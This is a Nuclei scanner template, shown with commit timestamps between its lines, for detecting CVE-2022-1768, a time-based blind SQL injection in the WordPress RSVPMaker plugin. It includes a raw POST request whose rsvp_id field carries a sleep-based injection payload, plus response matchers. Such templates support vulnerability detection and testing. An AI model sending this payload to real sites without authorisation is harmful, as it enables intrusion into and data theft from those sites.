2022-10-01 13:42:12 +00:00
id : CVE-2022-1768
info :
2022-10-19 21:11:27 +00:00
name : WordPress RSVPMaker <=9.3.2 - SQL Injection
2022-10-01 13:42:12 +00:00
author : edoardottt
2022-10-05 08:55:29 +00:00
severity : high
2022-10-01 13:42:12 +00:00
description : |
2022-10-19 21:11:27 +00:00
WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-10-01 13:42:12 +00:00
reference :
- https://gist.github.com/Xib3rR4dAr/441d6bb4a5b8ad4b25074a49210a02cc
2022-10-04 08:05:17 +00:00
- https://wordpress.org/plugins/rsvpmaker/
2022-10-05 08:55:29 +00:00
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2725322%40rsvpmaker&new=2725322%40rsvpmaker&sfp_email=&sfph_mail=
2022-10-19 21:11:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1768
2022-10-01 13:42:12 +00:00
classification :
2022-10-05 08:55:29 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-10-01 13:42:12 +00:00
cve-id : CVE-2022-1768
2022-10-05 08:55:29 +00:00
cwe-id : CWE-89
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:rsvpmaker_project:rsvpmaker:*:*:*:*:*:*:*:*
epss-score : 0.72757
2022-10-04 08:05:17 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-10-05 08:55:29 +00:00
verified : "true"
2022-10-04 08:05:17 +00:00
tags : cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker
2022-10-01 13:42:12 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-01 13:42:12 +00:00
- raw :
- |
2022-10-04 08:05:17 +00:00
@timeout : 15s
2022-10-01 13:42:12 +00:00
POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
rsvp_id=(select(0)from(select(sleep(5)))a)&amount=1234&email=randomtext
matchers-condition : and
matchers :
- type : dsl
dsl :
- 'duration>=5'
2022-10-04 08:05:17 +00:00
- type : word
part : body
words :
2022-10-05 08:10:51 +00:00
- '"payment_confirmation_message":'
2022-10-04 08:05:17 +00:00
- type : word
part : header
words :
- 'application/json'
2022-10-01 13:42:12 +00:00
- type : status
status :
2022-10-04 08:05:17 +00:00
- 200
2022-10-19 21:11:27 +00:00
# Enhanced by md on 2022/10/12